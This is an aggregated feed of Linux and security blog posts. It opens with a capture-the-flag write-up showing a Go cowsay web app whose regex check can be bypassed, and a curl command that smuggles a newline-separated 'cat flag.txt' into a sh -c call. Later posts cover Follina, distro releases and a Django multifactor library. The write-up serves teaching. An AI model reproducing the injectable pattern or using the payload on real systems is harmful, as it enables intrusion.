import (
	"fmt"
	"html/template"
	"io"
	"log"
	"net/http"
	"os"
	"os/exec"
	"regexp"
)

const (
	COWSAY_PATH = "/usr/games/cowsay"
)

var (
	modeRE = regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")
)

// Note: mode must be validated prior to running this!
func cowsay(mode, message string) (string, error) {
	cowcmd := fmt.Sprintf("%s %s -n", COWSAY_PATH, mode)
	log.Printf("Running cowsay as: %s", cowcmd)
	cmd := exec.Command("/bin/sh", "-c", cowcmd)
	stdin, err := cmd.StdinPipe()
	if err != nil {
		return "", err
	}
	go func() {
		defer stdin.Close()
		io.WriteString(stdin, message)
	}()
	outbuf, err := cmd.Output()
	if err != nil {
		return "", err
	}
	return string(outbuf), nil
}

func checkMode(mode string) error {
	if mode == "" {
		return nil
	}
	if !modeRE.MatchString(mode) {
		return fmt.Errorf("Mode must match regexp: %s", modeRE.String())
	}
	return nil
}

const cowTemplateSource = `
<!doctype html>
<html>
	<h1>Cow Say What?</h1>
	<p>I love <a href='https://www.mankier.com/1/cowsay'>cowsay</a> so much that
	I wanted to bring it to the web.  Enjoy!</p>
	{{if .Error}}
	<p><b>{{.Error}}</b></p>
	{{end}}
	<form method="POST" action="/">
	<select name="mode">
		<option value="">Plain</option>
		<option value="-b">Borg</option>
		<option value="-d">Dead</option>
		<option value="-g">Greedy</option>
		<option value="-p">Paranoid</option>
		<option value="-s">Stoned</option>
		<option value="-t">Tired</option>
		<option value="-w">Wired</option>
	</select><br />
	<textarea name="message" placeholder="message" cols="60" rows="10">{{.Message}}</textarea><br />
	<input type='submit' value='Say'><br />
	</form>
	{{if .CowSay}}
	<pre>{{.CowSay}}</pre>
	{{end}}
	<p>Check out <a href='/cowsay.go'>how it works</a>.</p>
</html>
`

var cowTemplate = template.Must(template.New("cowsay").Parse(cowTemplateSource))

type tmplVars struct {
	Error   string
	CowSay  string
	Message string
}

func cowsayHandler(w http.ResponseWriter, r *http.Request) {
	vars := tmplVars{}
	if r.Method == http.MethodPost {
		mode := r.FormValue("mode")
		message := r.FormValue("message")
		vars.Message = message
		if err := checkMode(mode); err != nil {
			vars.Error = err.Error()
		} else {
			if said, err := cowsay(mode, message); err != nil {
				log.Printf("Error running cowsay: %v", err)
				vars.Error = "An error occurred running cowsay."
			} else {
				vars.CowSay = said
			}
		}
	}
	cowTemplate.Execute(w, vars)
}

func sourceHandler(w http.ResponseWriter, r *http.Request) {
	http.ServeFile(w, r, "cowsay.go")
}

func main() {
	addr := "0.0.0.0:6789"
	if len(os.Args) > 1 {
		addr = os.Args[1]
	}
	http.HandleFunc("/cowsay.go", sourceHandler)
	http.HandleFunc("/", cowsayHandler)
	log.Fatal(http.ListenAndServe(addr, nil))
}

There’s a few things to unpack here, but probably most significant is that the cowsay output is produced by invoking an external program. Notably, it passes the message via stdin, and the mode as an argument to the program. The entire program is invoked via sh -c, which makes this similar to the system(3) libc function.

The mode is validated via a regular expression. As Jamie Zawinski once opined (and Jeff Atwood has commented on):

Some people, when confronted with a problem, think “I know, I’ll use regular expressions.” Now they have two problems.

Well, it turns out we do have two problems. Our regular expression is given by the statement:

modeRE = regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")

We can use a tool like regex101.com to play around with our expression. Specifically, it appears that it should consist of a - followed by one of the characters separated by pipes within the parentheses. At first, this appears pretty limiting, however, if we examine the Go regexp documentation, we might notice a few oddities. Specifically, ^ is defined as “at beginning of text or line (flag m=true)” and $ as “at end of text … or line (flag m=true)”. So apparently two of our special characters have different meanings depending on some “flags”.

There are no flags in our regular expression, so we’re using whatever the defaults are. Looking at the documentation for Flags, we see that there are two default sets of flags: Perl and POSIX. Slightly strangely, the constants use an inverted meaning for the m flag: OneLine, which causes the regular expression engine to “treat ^ and $ as only matching at beginning and end of text”. This flag is not included in POSIX (in fact, no flags are), so in a POSIX RE, ^ and $ match the beginning and end of lines respectively.

Our test for the Regexp to match is MatchString, which is documented as:

MatchString reports whether the string s contains any match of the regular expression re.

Note that the test is “contains any match”. If ^ and $ matched the beginning and end of the input, the entire string would have to match; but since they match the beginning and end of lines, MatchString returns true as long as the input contains a line matching the regular expression.
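The per-line anchoring is easy to reproduce with any POSIX regex tool; grep -E below matches input line by line, much like the POSIX anchors in the Go code. An input containing a newline still “matches” because its first line does:

```shell
# The second line is attacker-controlled, yet the pattern still finds a match,
# because the first line alone satisfies the line-anchored expression.
printf -- '-d\ncat flag.txt #' | grep -E '^-(b|d|g|p|s|t|w)$'
# prints: -d  (exit status 0, i.e. "matches")
```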

This now means we can pass arbitrary input via the mode parameter, which will be directly interpolated into the string passed to sh -c. Put another way, we now have a Command Injection vulnerability. We just need to also include a line that matches our regular expression.

To send a parameter containing a newline, we merely need to URL encode (sometimes called percent encoding) the character, resulting in %0A. This can be exploited with a simple cURL command:

curl 'https://cow-say-what-473bf31e.challenges.bsidessf.net/' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-raw 'mode=-d%0acat flag.txt #&message=foo'

The -d%0a matches the regular expression, then we have a command injected (cat flag.txt) and start a comment (#) to just ignore the rest of the command.

 _____
< foo >
 -----
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
CTF{dont_have_a_cow_have_a_flag}

07 June, 2022 07:00AM

hackergotchi for Qubes

Qubes

Fedora 34 has reached EOL

As a reminder following our previous announcement, Fedora 34 has now reached EOL (end-of-life). If you have not already done so, we strongly recommend upgrading all remaining Fedora 34 templates and standalones to Fedora 35 immediately.

We provide fresh Fedora 35 template packages through the official Qubes repositories, which you can install in dom0 by following the standard installation instructions. Alternatively, we also provide step-by-step instructions for performing an in-place upgrade of an existing Fedora template. After upgrading your templates, please remember to switch all qubes that were using the old template to use the new one.

For a complete list of template releases that are supported for your specific Qubes release, see our supported template releases.

Please note that no user action is required regarding the OS version in dom0. For details, please see our note on dom0 and EOL.

07 June, 2022 12:00AM

June 06, 2022

hackergotchi for Ubuntu

Ubuntu

Ubuntu Weekly Newsletter Issue 738

Welcome to the Ubuntu Weekly Newsletter, Issue 738 for the week of May 29 – June 4, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

06 June, 2022 10:56PM by guiverc

hackergotchi for Purism PureOS

Purism PureOS

The Ultimate Guide to Free Software

In a world that wants to track every move you make, we think it’s important to have alternatives that are free, open and respect your digital rights. Purism is a company dedicated to freedom, privacy, and security. At Purism, we make freedom-respecting hardware, software and online services. Software is the life-blood of any hardware. If […]

The post The Ultimate Guide to Free Software appeared first on Purism.

06 June, 2022 03:30PM by David Hamner

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: The State of IoT – May 2022

Welcome to the May edition of the monthly State of IoT series

May was a month full of exciting news, from open-source GPU modules and alternatives to the Jetson to a new Matter-ready hub for smart home appliances.

Before diving straight in, let’s cover noteworthy news not included in the recap below.

A few tech companies announced interesting partnerships this month.

Without further ado, let’s now go deeper into the most prominent news across the IoT landscape from last month.

NVIDIA open-sources GPU kernel modules

Back in the day, Linux developers wishing to steer clear of NVIDIA’s proprietary stack reverse-engineered its GPU features into what was named the Nouveau project. Much has changed since Linus snubbed NVIDIA in 2012 for hiding from the FOSS world. 

A couple of years later, the chipmaker provided significant technical guidance and was involved in architectural changes to Nouveau to support the GK20A GPU for Tegra K1 chips. Those contributions even earned them a “thumbs up” by Linus himself. 

Despite NVIDIA’s best efforts to offer Linux driver support with their proprietary stack, Intel and AMD’s decade-long open-source driver effort called for more contributions from the graphics card maker. In August 2020, NVIDIA unveiled its open-source GPU documentation GitHub page, fuelling speculation that it was softening its purely proprietary stance.

NVIDIA Releases Open-Source GPU Kernel Modules

This month, NVIDIA finally open-sourced kernel modules for their GPUs. With what was by now a much-awaited transition towards the landscape of open-source software, the silicon vendor released the kernel driver under a dual MIT/GPL license. Cindy Goldberg, VP of Silicon alliances at Canonical, noted how the new NVIDIA open-source GPU kernel modules simplify installs and increase security for Ubuntu consumers, whether AI/ML developers, gamers or cloud users. 

It’s worth mentioning that NVIDIA didn’t upstream the out-of-tree, open-source kernel drivers. Furthermore, because there can only be one driver for the same hardware in the Linux kernel, upstreaming will require lots of work in the Mesa graphics library and Nouveau. Also, one can’t avoid noting that most modern graphics driver logic still resides in the closed-source firmware and userspace components. Hector Martin from Asahi Linux criticised NVIDIA for moving most of the kernel driver into the firmware, which the open-sourced components call into.

AMD releases new robotics starter kit

Last May, AMD unveiled the Kria™ KR260 Robotics Starter Kit for robotics and industrial applications.

Compared to a chip-down design, the Kria adaptive system-on-module (SOM) approach accelerates the design cycle and shortens the time to deployment by up to nine months. AMD is targeting rapid robotics deployment at a compelling price with its latest release.

As a new addition to the Kria portfolio, the KR260 Kit is a complete development platform for robotics applications, machine vision, industrial communication and control. The Kria KR260 Starter Kit (Kria SOM + Carrier Card + Thermal Solution) offers native support for ROS 2, the de-facto open-source framework for building robot solutions. 

Getting Started with Kria KR260 Robotics Starter Kit

The Ubuntu 22.04 LTS operating system is the best choice to get up and running with the KR260. Robotics and industrial developers can now get started in minutes by following these steps.

IKEA launches a Matter-ready hub

Matter is a royalty-free, IPv6-based connectivity standard which defines the application layer deployed on devices. The Matter specification supports Wi-Fi, Thread and Bluetooth Low Energy (BLE). Although the specification is proprietary, i.e. licensed by the Connectivity Standards Alliance (CSA), formerly the Zigbee Alliance, the code is open-source.

Last March, the CSA announced a delay in releasing the Matter specification, citing additional testing: the Matter SDK will be feature-complete this spring, with version 0.9 of the specification available to all Alliance members towards mid-year. We expected the delay to push back the shipment of Matter-certified products. In May, however, IKEA announced a Matter-ready hub for smart products.

IKEA launches DIRIGERA, the Matter ready hub for smart products

Coupled with the IKEA Home smart app, the DIRIGERA hub aims to streamline the onboarding process when connecting appliances to the smart home. The Matter-ready hub and the app will be available in October, sustaining the continued growth of the smart home industry.

Nokia unveils SaaS services for home device management

IKEA wasn’t the only player making moves in the smart home sector last May. Approaching the vertical from a different angle in the tech stack, Nokia announced two new Software-as-Service (SaaS) offerings.

Nokia Home Device Management is a Customer Premise Equipment (CPE)-vendor-agnostic system providing management capabilities ranging from zero-touch provisioning and configuration updates to software upgrades, monitoring, and troubleshooting. Nokia touts that the solution supports any vendor and device, simplifying CPE management in home networks.

Automate remote management of home devices

The second service revealed by Nokia targets network energy efficiency. Nokia AVA (Analytics Virtualization and Automation) for Energy SaaS aims to minimise the carbon footprint and network energy costs of telco networks. The new energy management automation platform uses AI to benchmark the energy efficiency of passive infrastructure, like batteries and power supplies.

Nokia AVA for Energy SaaS’ approach is in stark contrast with conventional energy-saving methods, relying on pre-defined static shutdown windows, unfit for complex savings scenarios. Nokia argues the new service aligns with its commitment to 50% emissions reduction between 2019 and 2030 across its value chain.

Qualcomm announces new robotics solutions

AMD’s wasn’t the only announcement in the robotics arena from last May. 

Qualcomm revealed its RB6 Platform and RB5 AMR Reference Design, aiming to bring AI and 5G capabilities to the next generation of autonomous mobile robots.

The Robotics RB6 Platform is an all-in-one hardware solution for autonomous robotics. Qualcomm’s new solution is Wi-Fi 6-ready and includes 5G connectivity with support for global sub-6GHz and mmWave bands. The RB6 Platform targets streamlined robotics development via its suite of AI SDKs, including multimedia, AI/ML and computer vision capabilities.

Qualcomm Robotics RB6 Platform

Branded as the first AMR reference design with integrated AI and 5G, the RB5 AMR builds on the company’s extensive AI and 5G portfolio. Qualcomm already has a readily-available 5G and AI-integrated solution for drones, the Flight RB5 5G Platform. Moving past autonomous flight, Qualcomm is now targeting indoor navigation capabilities for autonomous robots via its RB5 AMR Reference Design. The robotics RB5 AMR is allegedly capable of navigating in GPS-denied environments by relying on Simultaneous Localization and Mapping (SLAM), a class of algorithms targeting indoor navigation. The Reference Design is “coming soon” and those interested can sign up for an email notification to be the first to know once available. 

Qualcomm RB5 AMR Reference Design

Stay tuned for more IoT news

We will soon be back with next month’s summary of IoT news. Meanwhile, join the conversation on IoT Discourse to discuss everything related to the Internet of Things and tightly connected, embedded devices. 

Further reading

Why is Linux the OS of choice for IoT devices? Find out with the official guide to Linux for embedded applications

Do you want to work on your next IoT project, but are unsure which OS to pick? Learn about the trade-offs between Yocto and Ubuntu Core now.

In case you are ready to get started on the de-facto development platform for IoT, learn about embedded Linux development on Ubuntu.

If you need to go back to the basics, learn what is embedded Linux today.

06 June, 2022 10:20AM

June 05, 2022

hackergotchi for Whonix

Whonix

Whonix 16.0.5.0 - for VirtualBox - Point Release!

Whonix for VirtualBox

Download Whonix for VirtualBox:


This is a point release.


Major Changes


Upgrade

Alternatively, an in-place release upgrade is possible using the Whonix repository.


This release would not have been possible without the numerous supporters of Whonix!


Please Donate!


Please Contribute!


Changelog


Full difference of all changes

Comparing 16.0.4.2-developers-only...16.0.5.0-developers-only · derivative-maker/derivative-maker · GitHub

1 post - 1 participant

Read full topic

05 June, 2022 01:15PM by Patrick

June 04, 2022

hackergotchi for Tails

Tails

Tails 5.1 is out

This release fixes the security vulnerability in the JavaScript engine of Firefox and Tor Browser announced on May 24.

This release was delayed from May 31 to June 5 because of a delay in the release of Tor Browser 11.0.14.

Changes and updates

Tor Connection assistant

Tails 5.1 includes many improvements to the Tor Connection assistant:

  • The Tor Connection assistant now automatically fixes the computer clock if you choose to connect to Tor automatically.

    This makes it much easier for people in Asia to circumvent censorship.

    Tails learns the current time by connecting to the captive portal detection service of Fedora, which is used by most Linux distributions. This connection does not go through the Tor network and is an exception to our policy of only making Internet connections through the Tor network.

  • The time displayed in the top navigation uses the time zone selected when fixing the clock in the Tor Connection assistant.

    In the future, we will make it possible to change the displayed time zone for everybody from the desktop (#10819) and store it in the Persistent Storage (#12094).

  • The last screen of the Tor Connection assistant makes it clear whether you are connected using Tor bridges or not.

    Connected to Tor successfully with bridges

Unsafe Browser and captive portals

  • We wrote a new homepage for the Unsafe Browser when you are not connected to the Tor network yet. This new version makes it easier to understand how to sign in to the network using a captive portal.

    Example of captive portal: Free Wi-Fi hotspot

  • Tails now asks for confirmation before restarting when the Unsafe Browser was not enabled in the Welcome Screen. This prevents losing work too easily.

Kleopatra

  • Associate OpenPGP files with Kleopatra in the Files browser.

    You can now double-click on .gpg files to decrypt them.

  • Add Kleopatra to the Favorites applications.

Included software

  • Update tor to 0.4.7.7.

  • Update Tor Browser to 11.0.14.

  • Update Thunderbird to 91.9.

  • Update the Linux kernel to 5.10.113. This should improve the support for newer hardware: graphics, Wi-Fi, and so on.

Fixed problems

  • Remove the automatic selection of the option Configure a bridge when rolling back from the option to hide that you are connecting to Tor. (#18546)

  • Give the same instructions on both screens where you have to configure a bridge. (#18596)

  • Help rename the default KeePassXC database to open it automatically in the future. (#18966)

  • Fix sharing files using OnionShare from the Files browser. (#18990)

    Share via OnionShare

  • Disable search providers in the Activities overview: files, calculator, and terminal. (#18952)

For more details, read our changelog.

Known issues

None specific to this release.

See the list of long-standing issues.

Get Tails 5.1

To upgrade your Tails USB stick and keep your persistent storage

  • Automatic upgrades are available from Tails 5.0.

    You can reduce the size of the download of future automatic upgrades by doing a manual upgrade to the latest version.

  • If you cannot do an automatic upgrade or if Tails fails to start after an automatic upgrade, please try to do a manual upgrade.

To install Tails on a new USB stick

Follow our installation instructions:

The Persistent Storage on the USB stick will be lost if you install instead of upgrading.

To download only

If you don't need installation or upgrade instructions, you can download Tails 5.1 directly:

What's coming up?

Tails 5.2 is scheduled for June 28.

Have a look at our roadmap to see where we are heading to.

04 June, 2022 06:00PM

hackergotchi for Ubuntu developers

Ubuntu developers

Simos Xenitellis: How to upgrade your Scaleway server

You have a Scaleway Virtual Private Server (VPS) and you are considering upgrading your installed Linux distribution. Perhaps you have been notified by Scaleway to upgrade an old Linux version. The email asks you to upgrade but does not give you the necessary information on how to upgrade or how to avoid certain pitfalls.

Scaleway email: “Important Notice: End-Of-Life of Your Instance Images”

What could go wrong when you try to upgrade?

A few things can go wrong.

Watch out for Bootscripts

The most important thing that can go wrong is if your VPS is using a bootscript. A bootscript is a fixed way of booting your Linux server, and it included a generic Scaleway-provided Linux kernel: you would be running Ubuntu, but the kernel would be a common Scaleway kernel shared by all Linux distributions, with config options set in stone, which caused some issues. That situation has changed and Scaleway now uses the distributions' own kernels. But since Scaleway sent an email about old Linux versions, you need to check this one out.

To verify, go into the Advanced Settings, under Boot Mode. If it looks as follows, then you are using a bootscript. When you upgrade the Linux version, the kernel will stay the same, as instructed by the bootscript. The proper Boot Mode should be “Use local boot” so that your VPS uses your distribution's own kernel. Fun fact #39192: if you offer Ubuntu to your users but do not use the Ubuntu kernel, Canonical does not grant you a (free) right to advertise that you are offering “Ubuntu”, because it is not really Ubuntu (the kernel is not a stock Ubuntu kernel). Since around 2019 Scaleway has defaulted to the Use local boot Boot Mode. In my case it was indeed Use local boot, therefore I did not have to deal with bootscripts. I just clicked on Use bootscript for the purposes of this post; I did not apply the change.

Boot Mode in the Scaleway Advanced Settings.

Verify that the console works (Serial console, recovery)

You normally connect to your Linux server using SSH. But what happens if something goes wrong and you lose access, especially while you are upgrading your Linux installation? You need a separate way, a backup option, to connect back to the server. This is achieved with the Console. It opens a browser window that gives you access to the Linux console of the server, over the web. It is separate from SSH, so if SSH access is not available but the server is still running, you can still get in here. Note that when you upgrade Debian or Ubuntu over SSH with do-release-upgrade, the upgrader creates a screen session that you can detach and attach at will. If you lose SSH access, connect to the Console and attach there.

Link to open the Console.

Note two things.

  1. The Console in Scaleway does not work on Firefox; anything based on Chromium should work fine. It is not clear why. If you place your mouse cursor on the button, it shows Firefox is not currently compatible with the serial console.
  2. Make sure that you know the username and password of your non-root account on your Scaleway server. No, really. You would normally connect with SSH and public-key authentication, and for what it's worth, the account's password could be locked. Try it out now and get a shell.

Beware of firewalls and security policies and security groups

When you upgrade the distribution on Debian and Ubuntu, and you do so over SSH, the installer/upgrader will tell you that it will start a backup SSH server on a different port, such as 1022. It will also tell you to open that port if you use a Linux firewall on your server. If you plan to keep that as a backup option, note that Scaleway has a facility called Security Groups that works like a global firewall for your Scaleway servers. That is, you can block access to certain ports if you specify them in the Security Group and have assigned those Scaleway servers to that Security Group.

Therefore, if you plan to rely on access to port 1022, make sure that the Security Group does not block it.
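To see for yourself which ports are in use while the upgrade runs, you can list the listening sockets from a shell on the server. A minimal sketch (ss ships with iproute2; netstat is the older fallback; port 1022 is the upgrader's usual fallback port, so it only appears once do-release-upgrade is running):

```shell
# Show listening TCP sockets; during the upgrade the fallback SSH daemon
# should appear on port 1022 alongside the normal sshd on port 22.
ss -tln 2>/dev/null || netstat -tln
# If you use ufw as your server-side firewall, the fallback port can be
# opened with: sudo ufw allow 1022/tcp (and check the Security Group too).
```

Remember that the Security Group filters traffic before it ever reaches your server's own firewall, so both need to allow the port.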

How to avoid having things go wrong?

When you upgrade a Linux distribution, you are asked all sorts of questions along the way. Most likely, the upgrader will ask whether you want to keep a certain configuration file or have it replaced by the newer version.

If you are upgrading your Ubuntu server, you would install the ubuntu-release-upgrader-core package and then run do-release-upgrade.

$ sudo apt install ubuntu-release-upgrader-core
...
$ sudo do-release-upgrade
...
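Before starting, it is worth double-checking which release you are actually on. A quick sketch; /etc/os-release is present on any systemd-era distribution:

```shell
# Print the currently installed release.
. /etc/os-release
echo "Running ${NAME} ${VERSION_ID:-unknown}"
# do-release-upgrade -c only checks whether a newer release is offered,
# without starting the upgrade itself.
```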

To avoid making a mistake here, you can launch a new Scaleway server with that old Linux distro version and perform a trial upgrade there. By doing so, you will see that you are asked

  1. whether to keep your old SSH configuration or install a new one. Install the new one and make a note to apply later any changes from the old configuration.
  2. whether to be asked which services to restart, or to let the system restart them automatically. Consider the former if the server deals with a lot of traffic.
  3. whether to keep or install the new configuration for the Web server. Most likely you keep the old configuration; otherwise your websites will not come back up automatically and you will need to fix the configuration files manually.
  4. whether you want to keep or update grub. AFAIK, grub is not used here, so the answer does not matter.
  5. whether you want to upgrade to the snap package of LXD. If you use LXD, you should have switched already to the snap package of LXD so that you are not asked here. If you do not use LXD, then before the upgrade you should uninstall LXD (the DEB version) so that the upgrade does not install the snap package of LXD. If the installer decides that you must upgrade LXD, you cannot select to skip it; you will get the snap package of LXD.

Here are some relevant screenshots.

You are upgrading over SSH so you are getting an extra SSH server for your safety.
How it looks when you upgrade from a pristine Ubuntu 16.04 to Ubuntu 18.04.
Fast-forward: the upgrade completed and we connect with SSH. We are prompted to upgrade again to the next LTS, Ubuntu 20.04.
How it looks when you upgrade from a pristine Ubuntu 18.04 to Ubuntu 20.04.

Troubleshooting

You have upgraded your server but your WordPress site does not start. Why? Here’s a screenshot.

Error “502 Bad Gateway” from a WordPress website.

A WordPress website requires PHP, and the PHP package does update automatically during the release upgrade. The problem is the Unix socket for PHP. The Web server (NGINX in our case) needs access to the Unix socket of PHP-FPM, and in Ubuntu the socket path depends on the PHP version, for example /run/php/php7.4-fpm.sock.

Ubuntu version    Filename for the PHP Unix socket
Ubuntu 16.04      /run/php/php7.0-fpm.sock
Ubuntu 18.04      /run/php/php7.2-fpm.sock
Ubuntu 20.04      /run/php/php7.4-fpm.sock
The filename of the PHP Unix socket per Ubuntu version.

Therefore, you need to open the configuration file for each of your websites and edit the PHP socket directory with the updated filename for the PHP Unix socket. Here is the corrected snippet for Ubuntu 20.04.

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
     include snippets/fastcgi-php.conf;
     #
     # # With php7.0-cgi alone:
     # fastcgi_pass 127.0.0.1:9000;
     # With php7.0-fpm:
     fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}
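Rather than editing every site by hand, the socket references can be rewritten in one pass with sed. The sketch below operates on a throwaway local file so the effect is visible; on a real server you would point the same substitution at your files under /etc/nginx/sites-enabled/ (after a backup) and run nginx -t before reloading:

```shell
# Create a sample site config with the old (Ubuntu 18.04) socket path.
cat > site.conf <<'EOF'
location ~ \.php$ {
    include snippets/fastcgi-php.conf;
    fastcgi_pass unix:/run/php/php7.2-fpm.sock;
}
EOF

# Point any old php7.0/php7.2 socket reference at the Ubuntu 20.04 socket.
sed -i 's|php7\.[02]-fpm\.sock|php7.4-fpm.sock|g' site.conf

grep fastcgi_pass site.conf
```

On the live server, finish with `sudo nginx -t && sudo systemctl reload nginx` so a typo never takes the Web server down.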

A request

Scaleway, if you are reading this, please have a look at this feature request.

04 June, 2022 03:51PM

June 03, 2022

hackergotchi for GreenboneOS

GreenboneOS

Follina (CVE-2022-30190): Greenbone’s Feeds Offer Protection

Once again, a flaw has surfaced in Microsoft Office that allows attackers to remotely execute malicious code on the systems of targeted users via manipulated documents. Known as Follina, the flaw behind CVE-2022-30190 has been known for years, but Microsoft has not fixed it to date. Greenbone has added an appropriate vulnerability test to its feeds to detect the new Follina vulnerability in Microsoft Office.

Follina (CVE-2022-30190)

Follina Requires Immediate Action

The CVE named “Follina” is critical and requires immediate action: just opening a Microsoft Word document can give attackers access to your resources. Because a flaw in Microsoft Office allows documents to load remote templates that invoke the ms-msdt: URI handler, attackers can create manipulated documents that, in the worst case, can take over entire client systems or spy on credentials.

According to Microsoft, the “protected view” offers protection. However, because users can deactivate this with just one click, the US manufacturer advises deactivating the entire URL handler via a registry entry. As of today, all Office versions seem to be affected.
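For reference, the registry workaround Microsoft published amounts to backing up and then removing the ms-msdt protocol handler (run from an elevated command prompt, and re-import the backup once a fix is installed):

```
reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdt-backup.reg
reg delete HKEY_CLASSES_ROOT\ms-msdt /f
```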

Greenbone Enterprise Feed Helps and Protects

The Greenbone Enterprise Feed and the Greenbone Community Feed now contain an authenticated check for Microsoft’s proposed workaround, helping you to protect yourself from the impact of the vulnerability. Our development team is monitoring the release of Microsoft patches and recommendations for further coverage. We will inform about updates here on the blog.

Securing IT Networks for the Long Term

If you want to know which systems in your network are (still) vulnerable, including to the critical vulnerability tracked as CVE-2022-30190, our vulnerability management helps you. It identifies systems that definitely need to be patched or otherwise protected. Depending on the type of system and vulnerability, they can be detected more or less reliably, and detection is constantly improving and being updated; new gaps keep being found, so there may always be more vulnerable systems in the network. It is therefore worthwhile to update and scan all systems regularly, and Greenbone's vulnerability management offers appropriate automation functions for this purpose.

Vulnerability management is an indispensable part of IT security. It can find risks and provides valuable information on how to eliminate them. However, no single measure, including vulnerability management, offers 100% security. Making a system secure requires many measures which, taken together, should provide the best possible protection.

03 June, 2022 12:59PM by Elmar Geese

hackergotchi for Ubuntu developers

Ubuntu developers

Oli Warner: Easy multifactor authentication in Django

Use django-multifactor to make your Django websites extra-secure by requiring a secondary authentication factor. Disclaimer: I made this.

django-multifactor

Three years ago I needed to add an extra layer of security around Django Admin. Usernames and passwords and even network-level limits weren't enough. That need quickly brewed into django-multifactor, but I've never blogged about it. This is a library that I now habitually install, so I thought it worth mentioning just in case it helps others too. Before we get very much older, let's answer the question that some of you might have: what is multifactor authentication?

Authentication factors come in a number of flavours; fundamentally different types of information:

  • Usernames and passwords are something you know
  • Smart cards and FIDO2 USB keys are something you have
  • Fingerprints and facial imprints are based on something you are

Multifactor authentication makes the user use more than one of these at once, and in doing so makes it far less likely that somebody can gain access with stolen credentials.

Django is a batteries-included framework. They're great batteries too; its authentication and Admin django.contrib libraries are core requirements for a lot of my projects. But as with most framework code, it's hard to change the behaviour, and shimming an extra factor into the normal login flow isn't easy.

This is where the decorator-based library django-multifactor steps up. It wraps the views you want to protect, and keeps track of its own authentication status. You can have some views with no secondary factor requirements, and some that demand two or three. It’s out of the normal authentication flow so it doesn’t need to alter how existing Django subsystems work.
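The wrapping idea can be sketched in a few lines of plain Python. This is only an illustration of the concept, not django-multifactor's actual internals; multifactor_required, FakeRequest and the session key are invented for the example:

```python
from functools import wraps

def multifactor_required(factors):
    """Reject a request whose session records fewer verified
    factors than required (illustrative sketch, not the library)."""
    def decorator(view):
        @wraps(view)
        def wrapper(request, *args, **kwargs):
            verified = request.session.get("verified_factors", [])
            if len(verified) < factors:
                return "redirect: /admin/multifactor/"
            return view(request, *args, **kwargs)
        return wrapper
    return decorator

class FakeRequest:
    """Stand-in for Django's HttpRequest with just a session dict."""
    def __init__(self, factors):
        self.session = {"verified_factors": factors}

@multifactor_required(factors=1)
def admin_view(request):
    return "admin page"

print(admin_view(FakeRequest([])))          # no factors yet: bounced
print(admin_view(FakeRequest(["fido2"])))   # one factor verified: allowed
```

Roughly speaking, django-multifactor does the equivalent bookkeeping against its own models and redirects through multifactor.urls instead of returning a string, which is why it can sit outside Django's normal authentication flow.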

Installing django-multifactor

Start by installing it (and a library to make wrapping includes easy):

pip install django-multifactor django-decorator-include

We need to make a couple of changes to your settings.py. First, add 'multifactor' to INSTALLED_APPS, and then we'll need to tell FIDO2 and U2F tokens what the name of our service is (i.e. the domain name):

MULTIFACTOR = {
    'FIDO_SERVER_ID': 'example.com',
    'FIDO_SERVER_NAME': 'My Django App',
    'TOKEN_ISSUER_NAME': 'My Django App',
    'U2F_APPID': 'https://example.com',
}

Now we just need to wrap it around the views in urls.py that we want to protect. Let’s protect the Admin:

from decorator_include import decorator_include
from multifactor.decorators import multifactor_protected

urlpatterns = [
    path('admin/multifactor/', include('multifactor.urls')),
    path('admin/', decorator_include(
        multifactor_protected(factors=1), admin.site.urls)),
    # ...
]

That’s it! Users accessing /admin/ will be bounced through /admin/multifactor/ to make sure they have enough factors. Your site is already more secure.

Taking it further

This gets you a system that allows OTP, U2F and any FIDO2 factors, with a fallback to email if the user doesn't have any of their installed factors to hand. On that note, email is a weak factor: many people share passwords between accounts and the transport can be unencrypted. It's easy to disable the email fallback, and it's just as easy to replace it with another, more secure transport, anything from SMS to carrier pigeons. You can also tweak the design, or see who's using it in UserAdmin.

The project has some miles on the clock now, and has been used in multiple production deployments of mine. It’s had help from external contributors too so I’d like to thank them all, especially @StevenMapes, for kicking my arse into gear. It’s been a weird few years.

If you think something’s missing, bug reports and PRs are very welcome. And if you can figure out a way to make this useful for django-rest-framework deployments, I welcome those suggestions on the drf bug.

But remember…

… few things withstand $5 wrenches. django-multifactor can insulate you against a lot of remote attacks but very little will secure against greed and fear. If you’re dealing with actual-important data, it’s important that you have monitored auditing in place, as well as a sensible permissions framework to ensure only the right people have access (no everyday superuser accounts!)

03 June, 2022 12:00AM

June 02, 2022

Lubuntu Blog: Lubuntu 21.10 End of Life and Current Support Statuses

Lubuntu 21.10 (Impish Indri) was released October 14, 2021 and will reach End of Life on Thursday, July 14, 2022. This means that after that date there will be no further security updates or bugfixes released. After July 14th, the only supported releases of Lubuntu will be 20.04 and 22.04. All other releases of Lubuntu will […]

02 June, 2022 11:14PM